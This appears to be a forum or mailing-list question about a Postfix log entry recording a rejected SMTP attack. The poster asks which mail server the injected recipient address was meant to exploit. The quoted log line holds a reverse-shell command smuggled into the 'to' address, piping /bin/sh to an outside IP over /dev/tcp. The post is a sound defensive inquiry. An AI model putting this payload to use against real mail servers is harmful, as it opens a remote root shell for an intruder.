A friend's Mac running Postfix logged this rejected attack: Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command rejected: need fully-qualified hostname; from=<b...@dick.com> to=<root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> proto=SMTP helo=<bluedick>
Of course this particular message was blocked at the HELO stage. But I was curious as to what attack vector this was trying to exploit and against what mail transport agent? I searched the web quite a bit and didn't see this particular attack discussed anywhere. Obviously the /dev/tcp/host/port part is trying to connect back to a C&C host and attach the network connection to a root shell. I understand the shell scripting part of the attack fine. The remote mta security exploit I couldn't locate references to was the "to=<root+:|exec /bin/sh ..." part of the attack. What mta is vulnerable to "+:|" in the To address? Or perhaps none are and this is simply a failed probe attempt? Thanks, Bob
